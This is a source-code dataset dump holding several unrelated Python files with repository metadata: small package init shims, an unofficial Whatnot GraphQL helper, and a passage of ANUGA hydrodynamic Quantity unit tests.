1f2c16b7402c237dfb4b47f0fa0afeb3bff7bd19
|
[
"Apache-2.0"
] | 1
|
2020-09-18T17:53:03.000Z
|
2020-09-18T17:53:03.000Z
|
src/clients/twitter/__init__.py
|
juanitodread/gorrion
|
1f2c16b7402c237dfb4b47f0fa0afeb3bff7bd19
|
[
"Apache-2.0"
] | 6
|
2020-10-27T03:31:41.000Z
|
2021-09-16T18:58:44.000Z
|
src/clients/twitter/__init__.py
|
juanitodread/gorrion
|
1f2c16b7402c237dfb4b47f0fa0afeb3bff7bd19
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
from src.clients.twitter.client import (
Twitter,
TwitterLocal,
)
from src.clients.twitter.models import PublishedTweet
from src.clients.twitter.config import TwitterConfig
| 24.5
| 53
| 0.790816
| 24
| 196
| 6.458333
| 0.541667
| 0.135484
| 0.270968
| 0.406452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005882
| 0.132653
| 196
| 7
| 54
| 28
| 0.905882
| 0.061224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
313519530f3b7fd1e6f86640611dcd6119ce7085
| 37
|
py
|
Python
|
discord/webhook/async_.py
|
Harukomaze/disnake
|
541f5c9623a02be894cd1015dbb344070700cb87
|
[
"MIT"
] | null | null | null |
discord/webhook/async_.py
|
Harukomaze/disnake
|
541f5c9623a02be894cd1015dbb344070700cb87
|
[
"MIT"
] | null | null | null |
discord/webhook/async_.py
|
Harukomaze/disnake
|
541f5c9623a02be894cd1015dbb344070700cb87
|
[
"MIT"
] | null | null | null |
from disnake.webhook.async_ import *
| 18.5
| 36
| 0.810811
| 5
| 37
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.878788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
316b29aee0c5c22612f6454966a5b61d32abe8f1
| 427
|
py
|
Python
|
whatnot/utils.py
|
willmeyers/unofficial-whatnot-api
|
b7b0792b77824a38b61f45c0e01f346673566a78
|
[
"MIT"
] | null | null | null |
whatnot/utils.py
|
willmeyers/unofficial-whatnot-api
|
b7b0792b77824a38b61f45c0e01f346673566a78
|
[
"MIT"
] | null | null | null |
whatnot/utils.py
|
willmeyers/unofficial-whatnot-api
|
b7b0792b77824a38b61f45c0e01f346673566a78
|
[
"MIT"
] | 1
|
2021-06-09T22:44:03.000Z
|
2021-06-09T22:44:03.000Z
|
import requets
BASE_URL = 'https://api.whatnot.com/graphql/'
def query(query, variables):
resp = requets.post(f'{BASE_URL}',
params=variables,
data={
'query': query
}
)
return resp.json()
def send_mutation(query, variables):
resp = requets.post(f'{BASE_URL}',
params=variables,
data={
'query': query
}
)
return resp.json()
| 15.814815
| 45
| 0.543326
| 46
| 427
| 4.956522
| 0.456522
| 0.092105
| 0.157895
| 0.219298
| 0.701754
| 0.701754
| 0.701754
| 0.701754
| 0.701754
| 0.701754
| 0
| 0
| 0.320843
| 427
| 26
| 46
| 16.423077
| 0.786207
| 0
| 0
| 0.555556
| 0
| 0
| 0.145199
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.055556
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3170941d662209873a4cdb4b02e25a9b3b97f34c
| 104,484
|
py
|
Python
|
anuga/abstract_2d_finite_volumes/tests/test_quantity.py
|
samcom12/anuga_core
|
f4378114dbf02d666fe6423de45798add5c42806
|
[
"Python-2.0",
"OLDAP-2.7"
] | null | null | null |
anuga/abstract_2d_finite_volumes/tests/test_quantity.py
|
samcom12/anuga_core
|
f4378114dbf02d666fe6423de45798add5c42806
|
[
"Python-2.0",
"OLDAP-2.7"
] | null | null | null |
anuga/abstract_2d_finite_volumes/tests/test_quantity.py
|
samcom12/anuga_core
|
f4378114dbf02d666fe6423de45798add5c42806
|
[
"Python-2.0",
"OLDAP-2.7"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import map
from builtins import str
from builtins import range
from past.utils import old_div
import unittest
from math import sqrt, pi
import tempfile
from anuga.abstract_2d_finite_volumes.quantity import *
from anuga.file_conversion.asc2dem import asc2dem
from anuga.config import epsilon
from anuga.fit_interpolate.fit import fit_to_mesh
#from anuga.pyvolution.least_squares import fit_to_mesh
from anuga.abstract_2d_finite_volumes.generic_domain \
import Generic_Domain
from anuga.geospatial_data.geospatial_data import Geospatial_data
from anuga.coordinate_transforms.geo_reference import Geo_reference
from anuga.geometry.polygon import *
import numpy as num
import pprint
#Aux for fit_interpolate.fit example
def linear_function(point):
point = num.array(point)
return point[:, 0]+3*point[:, 1]
#return point[:,1]
def axes2points(x, y):
"""Generate all combinations of grid point coordinates from x and y axes
Args:
* x: x coordinates (array)
* y: y coordinates (array)
Returns:
* P: Nx2 array consisting of coordinates for all
grid points defined by x and y axes. The x coordinate
will vary the fastest to match the way 2D numpy
arrays are laid out by default ('C' order). That way,
the x and y coordinates will match a corresponding
2D array A when flattened (A.flat[:] or A.reshape(-1))
Note:
Example
x = [1, 2, 3]
y = [10, 20]
P = [[1, 10],
[2, 10],
[3, 10],
[1, 20],
[2, 20],
[3, 20]]
"""
import numpy
# Reverse y coordinates to have them start at bottom of array
y = numpy.flipud(y)
# Repeat x coordinates for each y (fastest varying)
X = numpy.kron(numpy.ones(len(y)), x)
# Repeat y coordinates for each x (slowest varying)
Y = numpy.kron(y, numpy.ones(len(x)))
# Check
N = len(X)
assert len(Y) == N
# Create Nx2 array of x and y coordinates
X = numpy.reshape(X, (N, 1))
Y = numpy.reshape(Y, (N, 1))
P = numpy.concatenate((X, Y), axis=1)
# Return
return P
class Test_Quantity(unittest.TestCase):
def setUp(self):
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
elements = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
self.mesh1 = Generic_Domain(points[:3], [elements[0]])
self.mesh1.check_integrity()
#print self.mesh1.__class__
#print isinstance(self.mesh1, Domain)
self.mesh4 = Generic_Domain(points, elements)
self.mesh4.check_integrity()
# UTM round Onslow
a = [240000, 7620000]
b = [240000, 7680000]
c = [300000, 7620000]
points = [a, b, c]
elements = [[0, 2, 1]]
self.mesh_onslow = Generic_Domain(points, elements)
self.mesh_onslow.check_integrity()
def tearDown(self):
pass
#print " Tearing down"
def test_creation(self):
quantity = Quantity(self.mesh1, [[1, 2, 3]])
assert num.allclose(quantity.vertex_values, [[1., 2., 3.]])
try:
quantity = Quantity()
except:
pass
else:
raise Exception('Should have raised empty quantity exception')
# FIXME(Ole): Temporarily disabled 18 Jan 2009
#try:
# quantity = Quantity([1,2,3])
#except AssertionError:
# pass
#except:
# raise Exception('Should have raised "mising mesh object" error')
def test_creation_zeros(self):
quantity = Quantity(self.mesh1)
assert num.allclose(quantity.vertex_values, [[0., 0., 0.]])
quantity = Quantity(self.mesh4)
assert num.allclose(quantity.vertex_values, [[0., 0., 0.], [0., 0., 0.],
[0., 0., 0.], [0., 0., 0.]])
def test_set_boundary_values(self):
quantity = Quantity(self.mesh1)
quantity.set_boundary_values()
assert num.allclose(quantity.boundary_values, [0.0, 0.0, 0.0])
def test_set_boundary_values_with_function(self):
quantity = Quantity(self.mesh1)
#assert num.allclose(quantity.vertex_values, [[0.,0.,0.]])
def simple(x, y):
return x+3*y
quantity.set_boundary_values(simple)
assert num.allclose(quantity.boundary_values, [1.0, 4.0, 3.0])
def test_set_boundary_values_with_constant(self):
quantity = Quantity(self.mesh1)
#assert num.allclose(quantity.vertex_values, [[0.,0.,0.]])
quantity.set_boundary_values(10.0)
assert num.allclose(quantity.boundary_values, [10.0, 10.0, 10.0])
def test_set_boundary_values_with_array(self):
quantity = Quantity(self.mesh1)
#assert num.allclose(quantity.vertex_values, [[0.,0.,0.]])
quantity.set_boundary_values([10.0, 4.0, 5.0])
assert num.allclose(quantity.boundary_values, [10.0, 4.0, 5.0])
def test_set_boundary_values_with_wrong_sized_array(self):
quantity = Quantity(self.mesh1)
#assert num.allclose(quantity.vertex_values, [[0.,0.,0.]])
try:
quantity.set_boundary_values([10.0, 4.0, 5.0, 8.0])
except:
pass
else:
msg = 'Should have caught this'
raise Exception(msg)
def test_set_boundary_values_from_edges(self):
quantity = Quantity(self.mesh4)
def simple(x, y):
return x+3*y
quantity.set_values(simple)
assert num.allclose(quantity.boundary_values, [
0., 0., 0., 0., 0., 0.])
quantity.set_boundary_values_from_edges()
assert num.allclose(quantity.boundary_values, [
1., 3., 3., 6., 10., 9.])
def test_interpolation(self):
quantity = Quantity(self.mesh1, [[1, 2, 3]])
assert num.allclose(quantity.centroid_values, [2.0]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5]])
def test_interpolation2(self):
quantity = Quantity(self.mesh4,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
quantity.extrapolate_second_order()
#print quantity.vertex_values
assert num.allclose(quantity.vertex_values, [[3.5, -1.0, 3.5],
[3.+2./3, 6.+2./3, 4.+2./3],
[4.6, 3.4, 1.],
[-5.0, 1.0, 4.0]])
#print quantity.edge_values
assert num.allclose(quantity.edge_values, [[1.25, 3.5, 1.25],
[5. + 2/3.0, 4.0
+ 1.0/6, 5.0 + 1.0/6],
[2.2, 2.8, 4.0],
[2.5, -0.5, -2.0]])
def test_save_to_array(self):
quantity = Quantity(self.mesh4,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
cellsize = 1.0
x, y, z = quantity.save_to_array(cellsize=cellsize, smooth=False)
#x,y,z = quantity.save_to_array(smooth=False)
from pprint import pprint
#pprint(x)
#pprint(y)
#pprint(z)
x_ex = [0., 1., 2., 3., 4.]
y_ex = [0., 1., 2., 3., 4.]
z_ex = [[2.00000000e+00, 2.50000000e+00, 0.00000000e+00,
4.50000000e+00, 9.00000000e+00],
[1.50000000e+00, 5.00000000e+00, 0.00000000e+00,
4.50000000e+00, -9.99900000e+03],
[3.00000000e+00, 3.00000000e+00, 3.00000000e+00,
-9.99900000e+03, -9.99900000e+03],
[-1.50000000e+00, -1.50000000e+00, -9.99900000e+03,
-9.99900000e+03, -9.99900000e+03],
[-6.00000000e+00, -9.99900000e+03, -9.99900000e+03,
-9.99900000e+03, -9.99900000e+03]]
assert num.allclose(x_ex, x)
assert num.allclose(y_ex, y)
assert num.allclose(z_ex, z)
Plot = False
if Plot:
import pylab
import numpy
#a = numpy.where(a == -9999, numpy.nan, a)
#a = numpy.where(a > 10.0, numpy.nan, a)
#z = z[::-1,:]
print(z)
print(z.shape)
print(x)
print(y)
nrows = z.shape[0]
ncols = z.shape[1]
ratio = float(nrows)/float(ncols)
print(ratio)
#y = numpy.arange(nrows)*cellsize
#x = numpy.arange(ncols)*cellsize
#Setup fig size to correpond to array size
fig = pylab.figure(figsize=(10, 10*ratio))
levels = numpy.arange(-7, 10, 0.1)
CF = pylab.contourf(x, y, z, levels=levels)
CB = pylab.colorbar(CF, shrink=0.8, extend='both')
#CC = pylab.contour(x,y,a, levels=levels)
pylab.show()
x, y, z = quantity.save_to_array(cellsize=cellsize, smooth=True)
x_ex = [0., 1., 2., 3., 4.]
y_ex = [0., 1., 2., 3., 4.]
z_ex = [[2.00000000e+00, 2.33333333e+00, 2.66666667e+00,
5.83333333e+00, 9.00000000e+00],
[2.50000000e+00, 2.83333333e+00, 2.66666667e+00,
5.83333333e+00, -9.99900000e+03],
[3.00000000e+00, 2.83333333e+00, 2.66666667e+00,
-9.99900000e+03, -9.99900000e+03],
[-1.50000000e+00, -1.66666667e+00, -9.99900000e+03,
-9.99900000e+03, -9.99900000e+03],
[-6.00000000e+00, -9.99900000e+03, -9.99900000e+03,
-9.99900000e+03, -9.99900000e+03]]
#pprint(z)
assert num.allclose(x_ex, x)
assert num.allclose(y_ex, y)
assert num.allclose(z_ex, z)
if Plot:
import pylab
import numpy
#a = numpy.where(a == -9999, numpy.nan, a)
#a = numpy.where(a > 10.0, numpy.nan, a)
#a = a[::-1,:]
nrows = z.shape[0]
ncols = z.shape[1]
ratio = float(nrows)/float(ncols)
print(ratio)
#Setup fig size to correpond to array size
fig = pylab.figure(figsize=(10, 10*ratio))
levels = numpy.arange(-7, 10, 0.1)
CF = pylab.contourf(x, y, z, levels=levels)
CB = pylab.colorbar(CF, shrink=0.8, extend='both')
#CC = pylab.contour(x,y,a, levels=[0.0,1.0,2.0,3.0])
pylab.show()
def test_get_extrema_1(self):
quantity = Quantity(self.mesh4,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroids
v = quantity.get_maximum_value()
assert v == 5
v = quantity.get_minimum_value()
assert v == 0
i = quantity.get_maximum_index()
assert i == 1
i = quantity.get_minimum_index()
assert i == 3
x, y = quantity.get_maximum_location()
xref, yref = 4.0/3, 4.0/3
assert x == xref
assert y == yref
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 5)
x, y = quantity.get_minimum_location()
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 0)
def test_get_maximum_2(self):
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
domain = Generic_Domain(points, vertices)
quantity = Quantity(domain)
quantity.set_values(lambda x, y: x+2*y) # 2 4 4 6
v = quantity.get_maximum_value()
assert v == 6
v = quantity.get_minimum_value()
assert v == 2
i = quantity.get_maximum_index()
assert i == 3
i = quantity.get_minimum_index()
assert i == 0
x, y = quantity.get_maximum_location()
xref, yref = 2.0/3, 8.0/3
assert x == xref
assert y == yref
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 6)
x, y = quantity.get_minimum_location()
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 2)
#Multiple locations for maximum -
#Test that the algorithm picks the first occurrence
v = quantity.get_maximum_value(indices=[0, 1, 2])
assert num.allclose(v, 4)
i = quantity.get_maximum_index(indices=[0, 1, 2])
assert i == 1
x, y = quantity.get_maximum_location(indices=[0, 1, 2])
xref, yref = 4.0/3, 4.0/3
assert x == xref
assert y == yref
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 4)
# More test of indices......
v = quantity.get_maximum_value(indices=[2, 3])
assert num.allclose(v, 6)
i = quantity.get_maximum_index(indices=[2, 3])
assert i == 3
x, y = quantity.get_maximum_location(indices=[2, 3])
xref, yref = 2.0/3, 8.0/3
assert x == xref
assert y == yref
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 6)
def test_boundary_allocation(self):
quantity = Quantity(self.mesh4,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert quantity.boundary_values.shape[0] == len(self.mesh4.boundary)
def test_set_values(self):
quantity = Quantity(self.mesh4)
# get referece to data arrays
centroid_values = quantity.centroid_values
vertex_values = quantity.vertex_values
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='vertices')
assert num.allclose(quantity.vertex_values,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert id(vertex_values) == id(quantity.vertex_values)
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5],
[5., 5., 5.],
[4.5, 4.5, 0.],
[3.0, -1.5, -1.5]])
# Test default
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.vertex_values,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5],
[5., 5., 5.],
[4.5, 4.5, 0.],
[3.0, -1.5, -1.5]])
# Test centroids
quantity.set_values([1, 2, 3, 4], location='centroids')
assert num.allclose(quantity.centroid_values, [
1., 2., 3., 4.]) # Centroid
# Test exceptions
try:
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='bas kamel tuba')
except:
pass
try:
quantity.set_values([[1, 2, 3], [0, 0, 9]])
except ValueError:
pass
except:
raise Exception('should have raised ValueeError')
def test_set_values_const(self):
quantity = Quantity(self.mesh4)
quantity.set_values(1.0, location='vertices')
assert num.allclose(quantity.vertex_values,
[[1, 1, 1], [1, 1, 1], [1, 1, 1], [1, 1, 1]])
assert num.allclose(quantity.centroid_values, [1, 1, 1, 1]) # Centroid
assert num.allclose(quantity.edge_values, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
quantity.set_values(2.0, location='centroids')
assert num.allclose(quantity.centroid_values, [2, 2, 2, 2])
def test_set_values_func(self):
quantity = Quantity(self.mesh4)
def f(x, y):
return x+y
quantity.set_values(f, location='vertices')
#print "quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values,
[[2, 0, 2], [2, 2, 4], [4, 2, 4], [4, 2, 4]])
assert num.allclose(quantity.centroid_values,
[4.0/3, 8.0/3, 10.0/3, 10.0/3])
assert num.allclose(quantity.edge_values,
[[1, 2, 1], [3, 3, 2], [3, 4, 3], [3, 4, 3]])
quantity.set_values(f, location='centroids')
assert num.allclose(quantity.centroid_values,
[4.0/3, 8.0/3, 10.0/3, 10.0/3])
def test_integral(self):
quantity = Quantity(self.mesh4)
# Try constants first
const = 5
quantity.set_values(const, location='vertices')
#print 'Q', quantity.get_integral()
assert num.allclose(quantity.get_integral(),
self.mesh4.get_area() * const)
# Try with a linear function
def f(x, y):
return x+y
quantity.set_values(f, location='vertices')
ref_integral = (4.0/3 + 8.0/3 + 10.0/3 + 10.0/3) * 2
assert num.allclose(quantity.get_integral(), ref_integral)
def test_integral_with_region(self):
quantity = Quantity(self.mesh4)
# Try constants first
const = 5
quantity.set_values(const, location='vertices')
#print 'Q', quantity.get_integral()
assert num.allclose(quantity.get_integral(),
self.mesh4.get_area() * const)
# Try with a linear function
def f(x, y):
return x+y
quantity.set_values(f, location='vertices')
from anuga import Region
reg1 = Region(self.mesh4, indices=[2])
ref_integral = (10.0/3) * 2
assert num.allclose(quantity.get_integral(region=reg1), ref_integral)
reg2 = Region(self.mesh4, indices=[2, 3])
ref_integral = (10.0/3 + 10.0/3) * 2
assert num.allclose(quantity.get_integral(region=reg2), ref_integral)
id = [2, 3]
ref_integral = (10.0/3 + 10.0/3) * 2
assert num.allclose(quantity.get_integral(indices=id), ref_integral)
def test_set_vertex_values(self):
quantity = Quantity(self.mesh4)
quantity.set_vertex_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
assert num.allclose(quantity.centroid_values,
[1., 7./3, 11./3, 8./3]) # Centroid
assert num.allclose(quantity.edge_values, [[1., 1.5, 0.5],
[3., 2.5, 1.5],
[3.5, 4.5, 3.],
[2.5, 3.5, 2]])
def test_set_vertex_values_subset(self):
quantity = Quantity(self.mesh4)
quantity.set_vertex_values([0, 1, 2, 3, 4, 5])
quantity.set_vertex_values([0, 20, 30, 50], indices=[0, 2, 3, 5])
assert num.allclose(quantity.vertex_values,
[[1, 0, 20], [1, 20, 4], [4, 20, 50], [30, 1, 4]])
def test_set_vertex_values_using_general_interface(self):
quantity = Quantity(self.mesh4)
quantity.set_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
#Centroid
assert num.allclose(quantity.centroid_values, [1., 7./3, 11./3, 8./3])
assert num.allclose(quantity.edge_values, [[1., 1.5, 0.5],
[3., 2.5, 1.5],
[3.5, 4.5, 3.],
[2.5, 3.5, 2]])
def test_set_vertex_values_using_general_interface_with_subset(self):
"""test_set_vertex_values_using_general_interface_with_subset(self):
Test that indices and polygon works (for constants values)
"""
quantity = Quantity(self.mesh4)
quantity.set_values([0, 2, 3, 5], indices=[0, 2, 3, 5])
assert num.allclose(quantity.vertex_values,
[[0, 0, 2], [0, 2, 0], [0, 2, 5], [3, 0, 0]])
# Constant
quantity.set_values(0.0)
quantity.set_values(3.14, indices=[0, 2], location='vertices')
# Indices refer to triangle numbers
assert num.allclose(quantity.vertex_values,
[[3.14, 3.14, 3.14], [0, 0, 0],
[3.14, 3.14, 3.14], [0, 0, 0]])
# Now try with polygon (pick points where y>2)
polygon = [[0, 2.1], [4, 2.1], [4, 7], [0, 7]]
quantity.set_values(0.0)
quantity.set_values(3.14, polygon=polygon)
assert num.allclose(quantity.vertex_values,
[[0, 0, 0], [0, 0, 0], [0, 0, 0],
[3.14, 3.14, 3.14]])
# Another polygon (pick triangle 1 and 2 (rightmost triangles)
# using centroids
polygon = [[2.1, 0.0], [3.5, 0.1], [2, 2.2], [0.2, 2]]
quantity.set_values(0.0)
quantity.set_values(3.14, location='centroids', polygon=polygon)
assert num.allclose(quantity.vertex_values,
[[0, 0, 0],
[3.14, 3.14, 3.14],
[3.14, 3.14, 3.14],
[0, 0, 0]])
# Same polygon now use vertices (default)
polygon = [[2.1, 0.0], [3.5, 0.1], [2, 2.2], [0.2, 2]]
quantity.set_values(0.0)
#print 'Here 2'
quantity.set_values(3.14, polygon=polygon)
assert num.allclose(quantity.vertex_values,
[[0, 0, 0],
[3.14, 3.14, 3.14],
[3.14, 3.14, 3.14],
[0, 0, 0]])
# Test input checking
try:
quantity.set_values(3.14, polygon=polygon, indices=[0, 2])
except:
pass
else:
msg = 'Should have caught this'
raise Exception(msg)
def test_set_vertex_values_using_general_interface_subset_and_geo(self):
"""test_set_vertex_values_using_general_interface_with_subset(self):
Test that indices and polygon works using georeferencing
"""
quantity = Quantity(self.mesh4)
G = Geo_reference(56, 10, 100)
quantity.domain.set_georeference(G)
# Constant
quantity.set_values(0.0)
quantity.set_values(3.14, indices=[0, 2], location='vertices')
# Indices refer to triangle numbers here - not vertices (why?)
assert num.allclose(quantity.vertex_values,
[[3.14, 3.14, 3.14], [0, 0, 0],
[3.14, 3.14, 3.14], [0, 0, 0]])
# Now try with polygon (pick points where y>2)
polygon = num.array([[0, 2.1], [4, 2.1], [4, 7], [0, 7]])
polygon += [G.xllcorner, G.yllcorner]
quantity.set_values(0.0)
quantity.set_values(3.14, polygon=polygon, location='centroids')
assert num.allclose(quantity.vertex_values,
[[0, 0, 0], [0, 0, 0], [0, 0, 0],
[3.14, 3.14, 3.14]])
# Another polygon (pick triangle 1 and 2 (rightmost triangles)
polygon = num.array([[2.1, 0.0], [3.5, 0.1], [2, 2.2], [0.2, 2]])
polygon += [G.xllcorner, G.yllcorner]
quantity.set_values(0.0)
quantity.set_values(3.14, polygon=polygon)
msg = ('quantity.vertex_values=\n%s\nshould be close to\n'
'[[0,0,0],\n'
' [3.14,3.14,3.14],\n'
' [3.14,3.14,3.14],\n'
' [0,0,0]]' % str(quantity.vertex_values))
assert num.allclose(quantity.vertex_values,
[[0, 0, 0],
[3.14, 3.14, 3.14],
[3.14, 3.14, 3.14],
[0, 0, 0]]), msg
def test_set_values_using_fit(self):
quantity = Quantity(self.mesh4)
#Get (enough) datapoints
data_points = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
z = linear_function(data_points)
#Use built-in fit_interpolate.fit
quantity.set_values(Geospatial_data(data_points, z), alpha=0)
#quantity.set_values(points = data_points, values = z, alpha = 0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print quantity.vertex_values, answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Now try by setting the same values directly
vertex_attributes = fit_to_mesh(data_points,
quantity.domain.get_nodes(),
quantity.domain.get_triangles(),
point_attributes=z,
alpha=0,
verbose=False)
#print vertex_attributes
quantity.set_values(vertex_attributes)
assert num.allclose(quantity.vertex_values.flat, answer)
def test_test_set_values_using_fit_w_geo(self):
#Mesh
vertex_coordinates = [[0.76, 0.76],
[0.76, 5.76],
[5.76, 0.76]]
triangles = [[0, 2, 1]]
mesh_georef = Geo_reference(56, -0.76, -0.76)
mesh1 = Generic_Domain(vertex_coordinates, triangles,
geo_reference=mesh_georef)
mesh1.check_integrity()
#Quantity
quantity = Quantity(mesh1)
#Data
data_points = [[201.0, 401.0],
[201.0, 403.0],
[203.0, 401.0]]
z = [2, 4, 4]
data_georef = Geo_reference(56, -200, -400)
#Reference
ref = fit_to_mesh(data_points, vertex_coordinates, triangles,
point_attributes=z,
data_origin=data_georef.get_origin(),
mesh_origin=mesh_georef.get_origin(),
alpha=0)
assert num.allclose(ref, [0, 5, 5])
#Test set_values
quantity.set_values(Geospatial_data(
data_points, z, data_georef), alpha=0)
#quantity.set_values(points = data_points,
# values = z,
# data_georef = data_georef,
# alpha = 0)
#quantity.set_values(points = data_points,
# values = z,
# data_georef = data_georef,
# alpha = 0)
assert num.allclose(quantity.vertex_values.flat, ref)
#Test set_values using geospatial data object
quantity.vertex_values[:] = 0.0
geo = Geospatial_data(data_points, z, data_georef)
quantity.set_values(geospatial_data=geo, alpha=0)
assert num.allclose(quantity.vertex_values.flat, ref)
def test_set_values_from_file1(self):
quantity = Quantity(self.mesh4)
#Get (enough) datapoints
data_points = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
data_geo_spatial = Geospatial_data(data_points,
geo_reference=Geo_reference(56, 0, 0))
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
#Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
#Check that values can be set from file
quantity.set_values(filename=ptsfile,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print quantity.vertex_values.flat
#print answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=ptsfile, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(ptsfile)
def Xtest_set_values_from_file_using_polygon(self):
"""test_set_values_from_file_using_polygon(self):
Test that polygon restriction works for general points data
"""
quantity = Quantity(self.mesh4)
#Get (enough) datapoints
data_points = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
data_geo_spatial = Geospatial_data(data_points,
geo_reference=Geo_reference(56, 0, 0))
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
#Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
# Create restricting polygon (containing node #4 (2,2) and
# centroid of triangle #1 (bce)
polygon = [[1.0, 1.0], [4.0, 1.0],
[4.0, 4.0], [1.0, 4.0]]
#print self.mesh4.nodes
#print inside_polygon(self.mesh4.nodes, polygon)
assert num.allclose(inside_polygon(self.mesh4.nodes, polygon), 4)
